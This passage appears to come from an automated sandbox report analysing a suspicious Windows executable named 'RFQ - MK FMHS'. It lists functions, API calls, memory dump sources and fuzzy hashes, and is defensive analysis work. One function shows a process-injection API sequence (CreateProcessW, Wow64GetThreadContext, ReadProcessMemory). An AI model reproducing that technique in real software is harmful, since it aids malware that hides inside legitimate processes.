                    • Instruction Fuzzy Hash: 3111ACB1918305AFCB00EF29DC0591AFBF8EF89720F00852EF448A32A2DB71D545DB92
                    Function 00E75DF9 Relevance: 3.1, APIs: 2, Instructions: 57fileCOMMON
                    Download Yara Rule
                    APIs
                    • CreateFileW.KERNELBASE(?,80000000,00000007,00000000,00000003,00000080,00000000,?,00000000,?,00E75981,?,?,?,?), ref: 00E75E27
                    • CreateFileW.KERNEL32(?,C0000000,00000007,00000000,00000004,00000080,00000000,?,00000000,?,00E75981,?,?,?,?), ref: 00EAE19C
                    Memory Dump Source
                    • Source File: 00000000.00000002.1639837122.0000000000E71000.00000020.00000001.01000000.00000003.sdmp, Offset: 00E70000, based on PE: true
                    • Associated: 00000000.00000002.1639821332.0000000000E70000.00000002.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.1639875394.0000000000EFF000.00000002.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.1639875394.0000000000F25000.00000002.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.1639907468.0000000000F2F000.00000004.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.1639920421.0000000000F38000.00000002.00000001.01000000.00000003.sdmpDownload File
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_0_2_e70000_RFQ - MK FMHS.jbxd
                    Similarity
                    • API ID: CreateFile
                    • String ID:
                    • API String ID: 823142352-0
                    • Opcode ID: c38b998a59ed7a5b581b04038aa9563e4c9009c5e7f86844d17ecd320586ed25
                    • Instruction ID: ef74f206030e8f26a610b467aaab036a576a110497dfd0543ba1d8652550bed0
                    • Opcode Fuzzy Hash: c38b998a59ed7a5b581b04038aa9563e4c9009c5e7f86844d17ecd320586ed25
                    • Instruction Fuzzy Hash: BD014071244608BEF7250E24CC8AF767B9CEB0576CF10C719BAE97A1E0C6F45E598B50
                    Function 00E90FF6 Relevance: 3.0, APIs: 2, Instructions: 44COMMONLIBRARYCODE
                    Download Yara Rule
                    APIs
                      • Part of subcall function 00E9594C: __FF_MSGBANNER.LIBCMT ref: 00E95963
                      • Part of subcall function 00E9594C: __NMSG_WRITE.LIBCMT ref: 00E9596A
                      • Part of subcall function 00E9594C: RtlAllocateHeap.NTDLL(014A0000,00000000,00000001,00000000,?,?,?,00E91013,?), ref: 00E9598F
                    • std::exception::exception.LIBCMT ref: 00E9102C
                    • __CxxThrowException@8.LIBCMT ref: 00E91041
                      • Part of subcall function 00E987DB: RaiseException.KERNEL32(?,?,?,00F2BAF8,00000000,?,?,?,?,00E91046,?,00F2BAF8,?,00000001), ref: 00E98830
                    Memory Dump Source
                    • Source File: 00000000.00000002.1639837122.0000000000E71000.00000020.00000001.01000000.00000003.sdmp, Offset: 00E70000, based on PE: true
                    • Associated: 00000000.00000002.1639821332.0000000000E70000.00000002.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.1639875394.0000000000EFF000.00000002.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.1639875394.0000000000F25000.00000002.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.1639907468.0000000000F2F000.00000004.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.1639920421.0000000000F38000.00000002.00000001.01000000.00000003.sdmpDownload File
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_0_2_e70000_RFQ - MK FMHS.jbxd
                    Similarity
                    • API ID: AllocateExceptionException@8HeapRaiseThrowstd::exception::exception
                    • String ID:
                    • API String ID: 3902256705-0
                    • Opcode ID: 8e0cc2e6be86b6be0d605e637a280112a9268766da85436e4307ca23c020387c
                    • Instruction ID: cfe3a3ba8cf99ccf7c1fb75f31f866d39b1546c43659b8b1f63878d7d34dd948
                    • Opcode Fuzzy Hash: 8e0cc2e6be86b6be0d605e637a280112a9268766da85436e4307ca23c020387c
                    • Instruction Fuzzy Hash: 77F0283550031EA6CF20BA98ED059EF77EC9F01390F10106AFC04F6192DFB28E80A2E0
                    Function 00E9582D Relevance: 3.0, APIs: 2, Instructions: 42COMMONLIBRARYCODE
                    Download Yara Rule
                    APIs
                    Memory Dump Source
                    • Source File: 00000000.00000002.1639837122.0000000000E71000.00000020.00000001.01000000.00000003.sdmp, Offset: 00E70000, based on PE: true
                    • Associated: 00000000.00000002.1639821332.0000000000E70000.00000002.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.1639875394.0000000000EFF000.00000002.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.1639875394.0000000000F25000.00000002.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.1639907468.0000000000F2F000.00000004.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.1639920421.0000000000F38000.00000002.00000001.01000000.00000003.sdmpDownload File
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_0_2_e70000_RFQ - MK FMHS.jbxd
                    Similarity
                    • API ID: __lock_file_memset
                    • String ID:
                    • API String ID: 26237723-0
                    • Opcode ID: b342a8e1e05a77a1647171376c08fc31bc278b2e0a7b35e8f06c9e281a6adcb7
                    • Instruction ID: 5a989967c922cb889a6a98b5823118104e84c1351651d5fbc07c68156e608a5b
                    • Opcode Fuzzy Hash: b342a8e1e05a77a1647171376c08fc31bc278b2e0a7b35e8f06c9e281a6adcb7
                    • Instruction Fuzzy Hash: F6018472800608EBCF23AF699D0659E7BA1AF41360F145229B8147A1A1DB31CA21DB91
                    Function 00E955D6 Relevance: 3.0, APIs: 2, Instructions: 33COMMONLIBRARYCODE
                    Download Yara Rule
                    APIs
                      • Part of subcall function 00E98D68: __getptd_noexit.LIBCMT ref: 00E98D68
                    • __lock_file.LIBCMT ref: 00E9561B
                      • Part of subcall function 00E96E4E: __lock.LIBCMT ref: 00E96E71
                    • __fclose_nolock.LIBCMT ref: 00E95626
                    Memory Dump Source
                    • Source File: 00000000.00000002.1639837122.0000000000E71000.00000020.00000001.01000000.00000003.sdmp, Offset: 00E70000, based on PE: true
                    • Associated: 00000000.00000002.1639821332.0000000000E70000.00000002.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.1639875394.0000000000EFF000.00000002.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.1639875394.0000000000F25000.00000002.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.1639907468.0000000000F2F000.00000004.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.1639920421.0000000000F38000.00000002.00000001.01000000.00000003.sdmpDownload File
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_0_2_e70000_RFQ - MK FMHS.jbxd
                    Similarity
                    • API ID: __fclose_nolock__getptd_noexit__lock__lock_file
                    • String ID:
                    • API String ID: 2800547568-0
                    • Opcode ID: 3dd4633027ad274911521c9632817217baae444f1661060d5b413e92f4d98057
                    • Instruction ID: 32a3e016f4c71802da3bdef7ed6246ef2bd2098efdab606422e7a9984d23c3a5
                    • Opcode Fuzzy Hash: 3dd4633027ad274911521c9632817217baae444f1661060d5b413e92f4d98057
                    • Instruction Fuzzy Hash: 16F02472900B04DADF22BF3588027AE7BE02F01334F55A209E410BB1D2CF7C8A019B41
                    Function 00E5129D Relevance: 1.9, APIs: 1, Instructions: 400processthreadCOMMON
                    Download Yara Rule
                    APIs
                    • CreateProcessW.KERNELBASE(?,00000000), ref: 00E51A5B
                    • Wow64GetThreadContext.KERNEL32(?,00010007), ref: 00E51AF1
                    • ReadProcessMemory.KERNELBASE(?,?,?,00000004,00000000), ref: 00E51B13
                    Memory Dump Source
                    • Source File: 00000000.00000002.1639798335.0000000000E50000.00000040.00001000.00020000.00000000.sdmp, Offset: 00E50000, based on PE: false
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_0_2_e50000_RFQ - MK FMHS.jbxd
                    Similarity
                    • API ID: Process$ContextCreateMemoryReadThreadWow64
                    • String ID:
                    • API String ID: 2438371351-0
                    • Opcode ID: 6ff7500a3617197a005732162d507dd4d37460c8dcbf147a4ae2be43d63b6423
                    • Instruction ID: 887003b6dc995f215f0af84eba126598068d791f1ed7f5201f7a9109d6e6d11e
                    • Opcode Fuzzy Hash: 6ff7500a3617197a005732162d507dd4d37460c8dcbf147a4ae2be43d63b6423
                    • Instruction Fuzzy Hash: F412FE24E14658C6EB24DF60D8507DEB232EF68300F10A4E9D10DEB7A5E77A4F85CB5A
                    Function 00E7F3F0 Relevance: 1.7, APIs: 1, Instructions: 185COMMON
                    Download Yara Rule
                    Memory Dump Source
                    • Source File: 00000000.00000002.1639837122.0000000000E71000.00000020.00000001.01000000.00000003.sdmp, Offset: 00E70000, based on PE: true
                    • Associated: 00000000.00000002.1639821332.0000000000E70000.00000002.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.1639875394.0000000000EFF000.00000002.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.1639875394.0000000000F25000.00000002.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.1639907468.0000000000F2F000.00000004.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.1639920421.0000000000F38000.00000002.00000001.01000000.00000003.sdmpDownload File
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_0_2_e70000_RFQ - MK FMHS.jbxd
                    Similarity
                    • API ID:
                    • String ID:
                    • API String ID:
                    • Opcode ID: 8c502333a63c5187f5dfc21b216ee9bb08546162928b1d1484ba3039136a17fe
                    • Instruction ID: 6b9c6be6e4e790f63d10e8c711c4aca58c02a005abcf9bca67575087fdbe43fb
                    • Opcode Fuzzy Hash: 8c502333a63c5187f5dfc21b216ee9bb08546162928b1d1484ba3039136a17fe
                    • Instruction Fuzzy Hash: C4619DB060020A9FDB14DF64C981ABBB7F5EF44304F14947AE91AA7282EB71ED51CB51
                    Function 00E82123 Relevance: 1.7, APIs: 1, Instructions: 171COMMON
                    Download Yara Rule
                    Memory Dump Source
                    • Source File: 00000000.00000002.1639837122.0000000000E71000.00000020.00000001.01000000.00000003.sdmp, Offset: 00E70000, based on PE: true
                    • Associated: 00000000.00000002.1639821332.0000000000E70000.00000002.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.1639875394.0000000000EFF000.00000002.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.1639875394.0000000000F25000.00000002.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.1639907468.0000000000F2F000.00000004.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.1639920421.0000000000F38000.00000002.00000001.01000000.00000003.sdmpDownload File
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_0_2_e70000_RFQ - MK FMHS.jbxd
                    Similarity
                    • API ID:
                    • String ID:
                    • API String ID:
                    • Opcode ID: d5ed8673866a03d777de666139581d7ff4f5f8f875c885cb2cd41f70ce911cf2
                    • Instruction ID: ab8c6b607f23b4a8ffce0924ad6568fea5e8c9b2d04a91aaea1b7cdf9141a8df
                    • Opcode Fuzzy Hash: d5ed8673866a03d777de666139581d7ff4f5f8f875c885cb2cd41f70ce911cf2
                    • Instruction Fuzzy Hash: 04518F35700604AFCF14EB54C995EAE77E6AF85314F14A0A8FA0EBB392DA34ED01CB55
                    Function 00E75C4E Relevance: 1.6, APIs: 1, Instructions: 97COMMON
                    Download Yara Rule
                    APIs
                    • SetFilePointerEx.KERNELBASE(?,?,00000001,00000000,00000000,?,?,00000000), ref: 00E75CF6
                    Memory Dump Source
                    • Source File: 00000000.00000002.1639837122.0000000000E71000.00000020.00000001.01000000.00000003.sdmp, Offset: 00E70000, based on PE: true
                    • Associated: 00000000.00000002.1639821332.0000000000E70000.00000002.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.1639875394.0000000000EFF000.00000002.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.1639875394.0000000000F25000.00000002.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.1639907468.0000000000F2F000.00000004.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.1639920421.0000000000F38000.00000002.00000001.01000000.00000003.sdmpDownload File
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_0_2_e70000_RFQ - MK FMHS.jbxd
                    Similarity
                    • API ID: FilePointer
                    • String ID:
                    • API String ID: 973152223-0
                    • Opcode ID: f1c4287dc4003043d0ab1da7f10398cbc2d2cb44ac53708e3c4960a38ee3a463
                    • Instruction ID: 09255e6e3091b57731fb6802bf6c21c0bd0fdc921ec687356990533f7020293a
                    • Opcode Fuzzy Hash: f1c4287dc4003043d0ab1da7f10398cbc2d2cb44ac53708e3c4960a38ee3a463
                    • Instruction Fuzzy Hash: 18314932A00B19ABCB18CF29C484AADF7B5FF48314F15C629E819A3710D7B1B960DB90
                    Function 00EB00D6 Relevance: 1.6, APIs: 1, Instructions: 88COMMON
                    Download Yara Rule
                    APIs
                    Memory Dump Source
                    • Source File: 00000000.00000002.1639837122.0000000000E71000.00000020.00000001.01000000.00000003.sdmp, Offset: 00E70000, based on PE: true
                    • Associated: 00000000.00000002.1639821332.0000000000E70000.00000002.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.1639875394.0000000000EFF000.00000002.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.1639875394.0000000000F25000.00000002.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.1639907468.0000000000F2F000.00000004.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.1639920421.0000000000F38000.00000002.00000001.01000000.00000003.sdmpDownload File
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_0_2_e70000_RFQ - MK FMHS.jbxd
                    Similarity
                    • API ID: ClearVariant
                    • String ID:
                    • API String ID: 1473721057-0
                    • Opcode ID: b6c7329cfb8f1eec0324660b328fd7979531668b490caaaf4d6a742a068c13cb
                    • Instruction ID: c94a98bea3581839dd18531494f0bc0959d7101d56ddbee91436a4b2018593a0
                    • Opcode Fuzzy Hash: b6c7329cfb8f1eec0324660b328fd7979531668b490caaaf4d6a742a068c13cb
                    • Instruction Fuzzy Hash: CA410774508341CFDB24DF14C484B5ABBE0BF85358F1999ACE9996B362D332F885CB52
                    Function 00E75B19 Relevance: 1.6, APIs: 1, Instructions: 72COMMON
                    Download Yara Rule
                    APIs
                    Memory Dump Source
                    • Source File: 00000000.00000002.1639837122.0000000000E71000.00000020.00000001.01000000.00000003.sdmp, Offset: 00E70000, based on PE: true
                    • Associated: 00000000.00000002.1639821332.0000000000E70000.00000002.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.1639875394.0000000000EFF000.00000002.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.1639875394.0000000000F25000.00000002.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.1639907468.0000000000F2F000.00000004.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.1639920421.0000000000F38000.00000002.00000001.01000000.00000003.sdmpDownload File
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_0_2_e70000_RFQ - MK FMHS.jbxd
                    Similarity
                    • API ID: _memmove
                    • String ID:
                    • API String ID: 4104443479-0
                    • Opcode ID: eb6900a062db58abaf17e29293d38e6c687487af8f073c8e63e9d39a5121e2de
                    • Instruction ID: c7b6d3171ae0742f0058ee40d07b189a6554cfe4cd4b54c232175b64fd3323df
                    • Opcode Fuzzy Hash: eb6900a062db58abaf17e29293d38e6c687487af8f073c8e63e9d39a5121e2de
                    • Instruction Fuzzy Hash: 75210531A00A08EBCF245F51E88567A7FF8FF15340F21D86AE885F9110EBB1A4E09B41
                    Function 00E7C707 Relevance: 1.6, APIs: 1, Instructions: 69COMMON
                    Download Yara Rule
                    APIs
                    Memory Dump Source
                    • Source File: 00000000.00000002.1639837122.0000000000E71000.00000020.00000001.01000000.00000003.sdmp, Offset: 00E70000, based on PE: true
                    • Associated: 00000000.00000002.1639821332.0000000000E70000.00000002.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.1639875394.0000000000EFF000.00000002.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.1639875394.0000000000F25000.00000002.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.1639907468.0000000000F2F000.00000004.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.1639920421.0000000000F38000.00000002.00000001.01000000.00000003.sdmpDownload File
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_0_2_e70000_RFQ - MK FMHS.jbxd
                    Similarity
                    • API ID: _wcscmp
                    • String ID:
                    • API String ID: 856254489-0
                    • Opcode ID: f7519ed13edc392e3558d109c29bf0c6ddf1580746be009d57a1e37aa0a9f0f9
                    • Instruction ID: 9efdc7c62ec74022dc9c7bc8be04a272eac065f1a09dd114fabf330cfd5a74f6
                    • Opcode Fuzzy Hash: f7519ed13edc392e3558d109c29bf0c6ddf1580746be009d57a1e37aa0a9f0f9
                    • Instruction Fuzzy Hash: 5F11A572904119DBCB14EBA9DC819EEF7B8EF54360F60912AE819B7190DB309D45CB91
                    Function 00E74F3D Relevance: 1.6, APIs: 1, Instructions: 64libraryCOMMON
                    Download Yara Rule
                    APIs
                      • Part of subcall function 00E74D13: FreeLibrary.KERNEL32(00000000,?), ref: 00E74D4D
                      • Part of subcall function 00E9548B: __wfsopen.LIBCMT ref: 00E95496
                    • LoadLibraryExW.KERNELBASE(?,00000000,00000002,?,00F362F8,00000001,>>>AUTOIT NO CMDEXECUTE<<<,?), ref: 00E74F6F
                      • Part of subcall function 00E74CC8: FreeLibrary.KERNEL32(00000000), ref: 00E74D02
                      • Part of subcall function 00E74DD0: _memmove.LIBCMT ref: 00E74E1A
                    Memory Dump Source
                    • Source File: 00000000.00000002.1639837122.0000000000E71000.00000020.00000001.01000000.00000003.sdmp, Offset: 00E70000, based on PE: true
                    • Associated: 00000000.00000002.1639821332.0000000000E70000.00000002.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.1639875394.0000000000EFF000.00000002.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.1639875394.0000000000F25000.00000002.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.1639907468.0000000000F2F000.00000004.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.1639920421.0000000000F38000.00000002.00000001.01000000.00000003.sdmpDownload File
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_0_2_e70000_RFQ - MK FMHS.jbxd
                    Similarity
                    • API ID: Library$Free$Load__wfsopen_memmove
                    • String ID:
                    • API String ID: 1396898556-0
                    • Opcode ID: e2e94e81146c24141cd9dd8cb588b1acdfb6b76f30b331486fedbd8190748683
                    • Instruction ID: 3d8b6a5663e4efa2aa43bbbfceb26ed6159bccb6ecd60eeb0597d3d03e53e6ef
                    • Opcode Fuzzy Hash: e2e94e81146c24141cd9dd8cb588b1acdfb6b76f30b331486fedbd8190748683
                    • Instruction Fuzzy Hash: 3611C472700209AADB15EF70CC02FAE77E49F45700F14E429F546B61C1DB719A059B90
                    Function 00EB01AF Relevance: 1.6, APIs: 1, Instructions: 63COMMON
                    Download Yara Rule
                    APIs
                    Memory Dump Source
                    • Source File: 00000000.00000002.1639837122.0000000000E71000.00000020.00000001.01000000.00000003.sdmp, Offset: 00E70000, based on PE: true
                    • Associated: 00000000.00000002.1639821332.0000000000E70000.00000002.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.1639875394.0000000000EFF000.00000002.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.1639875394.0000000000F25000.00000002.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.1639907468.0000000000F2F000.00000004.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.1639920421.0000000000F38000.00000002.00000001.01000000.00000003.sdmpDownload File
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_0_2_e70000_RFQ - MK FMHS.jbxd
                    Similarity
                    • API ID: ClearVariant
                    • String ID:
                    • API String ID: 1473721057-0
                    • Opcode ID: ce4255e8a0dce2f96e3092e1bc1ed476679d117596769907f422291c52df8eb5
                    • Instruction ID: 1e4622fdc37779810e8018108ac5d70c19726d531e84fdf7ff353099ba494efc
                    • Opcode Fuzzy Hash: ce4255e8a0dce2f96e3092e1bc1ed476679d117596769907f422291c52df8eb5
                    • Instruction Fuzzy Hash: 2F2113B4508341CFCB24DF64C444A5BBBE0BF84348F09996CE99A67762D732F849CB52
                    Function 00E75D20 Relevance: 1.6, APIs: 1, Instructions: 53fileCOMMON
                    Download Yara Rule
                    APIs
                    • ReadFile.KERNELBASE(?,?,00010000,?,00000000,00000000,?,00010000,?,00E75807,00000000,00010000,00000000,00000000,00000000,00000000), ref: 00E75D76
                    Memory Dump Source
                    • Source File: 00000000.00000002.1639837122.0000000000E71000.00000020.00000001.01000000.00000003.sdmp, Offset: 00E70000, based on PE: true
                    • Associated: 00000000.00000002.1639821332.0000000000E70000.00000002.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.1639875394.0000000000EFF000.00000002.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.1639875394.0000000000F25000.00000002.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.1639907468.0000000000F2F000.00000004.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.1639920421.0000000000F38000.00000002.00000001.01000000.00000003.sdmpDownload File
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_0_2_e70000_RFQ - MK FMHS.jbxd
                    Similarity
                    • API ID: FileRead
                    • String ID:
                    • API String ID: 2738559852-0
                    • Opcode ID: 6d6e646af9b9b77e3593da603413cca17000d2cd4998650e4065e0a2d5af79a4
                    • Instruction ID: a21530613c88f9a514b54924e333da7476d72007981621df44b0a4e3c64c01cb
                    • Opcode Fuzzy Hash: 6d6e646af9b9b77e3593da603413cca17000d2cd4998650e4065e0a2d5af79a4
                    • Instruction Fuzzy Hash: 5A112532200B059FD3308F55C888B63B7E9EF45764F10C92EE6AA96A50D7B0E945CB60
                    Function 00E7C6DA Relevance: 1.6, APIs: 1, Instructions: 50COMMON
                    Download Yara Rule
                    APIs
                    Memory Dump Source
                    • Source File: 00000000.00000002.1639837122.0000000000E71000.00000020.00000001.01000000.00000003.sdmp, Offset: 00E70000, based on PE: true
                    • Associated: 00000000.00000002.1639821332.0000000000E70000.00000002.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.1639875394.0000000000EFF000.00000002.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.1639875394.0000000000F25000.00000002.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.1639907468.0000000000F2F000.00000004.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.1639920421.0000000000F38000.00000002.00000001.01000000.00000003.sdmpDownload File
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_0_2_e70000_RFQ - MK FMHS.jbxd
                    Similarity
                    • API ID: _wcscmp
                    • String ID:
                    • API String ID: 856254489-0
                    • Opcode ID: 3ceba20c602146155305d30b3e041ff8096f56920792639c34ca3a381b4e41f1
                    • Instruction ID: dee83c3306eb1fc5ec450f56956a3bfbc3e2ca37666d5dc8839e9f6aaaf52a80
                    • Opcode Fuzzy Hash: 3ceba20c602146155305d30b3e041ff8096f56920792639c34ca3a381b4e41f1
                    • Instruction Fuzzy Hash: 27012631D042459FEB068F7988806EEFBB99F56320F15C09BD858FB2A1E7308D42CB80
                    Function 00E75BDA Relevance: 1.5, APIs: 1, Instructions: 48COMMON
                    Download Yara Rule
                    APIs
                    Memory Dump Source
                    • Source File: 00000000.00000002.1639837122.0000000000E71000.00000020.00000001.01000000.00000003.sdmp, Offset: 00E70000, based on PE: true
                    • Associated: 00000000.00000002.1639821332.0000000000E70000.00000002.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.1639875394.0000000000EFF000.00000002.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.1639875394.0000000000F25000.00000002.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.1639907468.0000000000F2F000.00000004.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.1639920421.0000000000F38000.00000002.00000001.01000000.00000003.sdmpDownload File
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_0_2_e70000_RFQ - MK FMHS.jbxd
                    Similarity
                    • API ID: _memmove
                    • String ID:
                    • API String ID: 4104443479-0
                    • Opcode ID: 327c95574f60e5010daba2857bec39af6c2e223ed2d997c94b99b88fa264bf6e
                    • Instruction ID: 4053cbf3bfe71182f4866296174423596861f9a48bc0ca316c2e1712432d86b0
                    • Opcode Fuzzy Hash: 327c95574f60e5010daba2857bec39af6c2e223ed2d997c94b99b88fa264bf6e
                    • Instruction Fuzzy Hash: 4A017CB9600942AFC705DB69C841D66FBEAFF8A3103149159E819D7702DB71AC22CBE0
                    Function 00E94A93 Relevance: 1.5, APIs: 1, Instructions: 36COMMON
                    Download Yara Rule
                    APIs
                    • __lock_file.LIBCMT ref: 00E94AD6
                      • Part of subcall function 00E98D68: __getptd_noexit.LIBCMT ref: 00E98D68
                    Memory Dump Source
                    • Source File: 00000000.00000002.1639837122.0000000000E71000.00000020.00000001.01000000.00000003.sdmp, Offset: 00E70000, based on PE: true
                    • Associated: 00000000.00000002.1639821332.0000000000E70000.00000002.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.1639875394.0000000000EFF000.00000002.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.1639875394.0000000000F25000.00000002.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.1639907468.0000000000F2F000.00000004.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.1639920421.0000000000F38000.00000002.00000001.01000000.00000003.sdmpDownload File
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_0_2_e70000_RFQ - MK FMHS.jbxd
                    Similarity
                    • API ID: __getptd_noexit__lock_file
                    • String ID:
                    • API String ID: 2597487223-0
                    • Opcode ID: 9fba02d1b84cc368069aea92dfa1dda3df4449131385717917c189043a30db28
                    • Instruction ID: e78037e4e789ea2182143cb7fa5c084431ebd2adcab8ccf1bcb0038b078886f0
                    • Opcode Fuzzy Hash: 9fba02d1b84cc368069aea92dfa1dda3df4449131385717917c189043a30db28
                    • Instruction Fuzzy Hash: 1DF0A4B19402099BDF61AF748C06BDE37E1AF0132AF086514B814BA1E1EBB88A52DF51
                    Function 00E74FAA Relevance: 1.5, APIs: 1, Instructions: 28COMMON
                    Download Yara Rule
                    APIs
                    • FreeLibrary.KERNEL32(?,?,00F362F8,00000001,>>>AUTOIT NO CMDEXECUTE<<<,?), ref: 00E74FDE
                    Memory Dump Source
                    • Source File: 00000000.00000002.1639837122.0000000000E71000.00000020.00000001.01000000.00000003.sdmp, Offset: 00E70000, based on PE: true
                    • Associated: 00000000.00000002.1639821332.0000000000E70000.00000002.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.1639875394.0000000000EFF000.00000002.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.1639875394.0000000000F25000.00000002.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.1639907468.0000000000F2F000.00000004.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.1639920421.0000000000F38000.00000002.00000001.01000000.00000003.sdmpDownload File
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_0_2_e70000_RFQ - MK FMHS.jbxd
                    Similarity
                    • API ID: FreeLibrary
                    • String ID:
                    • API String ID: 3664257935-0
                    • Opcode ID: b294d6862ad0c0b2e5808129d0695e1a2eb6432878c8a89fb199236dbcb90810
                    • Instruction ID: 7b3db36e41aaeab9d4ea69a3579f2f691ab680a8c0df2f343b44eca3c42431de
                    • Opcode Fuzzy Hash: b294d6862ad0c0b2e5808129d0695e1a2eb6432878c8a89fb199236dbcb90810
                    • Instruction Fuzzy Hash: 66F039B1205712CFCB389F64E494862BBE1BF04329321EA3EE1DAA2651C731A844DF40
                    Function 00E909D5 Relevance: 1.5, APIs: 1, Instructions: 24COMMON
                    Download Yara Rule
                    APIs
                    • GetLongPathNameW.KERNELBASE(?,?,00007FFF), ref: 00E909F4
                      • Part of subcall function 00E77D2C: _memmove.LIBCMT ref: 00E77D66
                    Memory Dump Source
                    • Source File: 00000000.00000002.1639837122.0000000000E71000.00000020.00000001.01000000.00000003.sdmp, Offset: 00E70000, based on PE: true
                    • Associated: 00000000.00000002.1639821332.0000000000E70000.00000002.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.1639875394.0000000000EFF000.00000002.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.1639875394.0000000000F25000.00000002.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.1639907468.0000000000F2F000.00000004.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.1639920421.0000000000F38000.00000002.00000001.01000000.00000003.sdmpDownload File
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_0_2_e70000_RFQ - MK FMHS.jbxd
                    Similarity
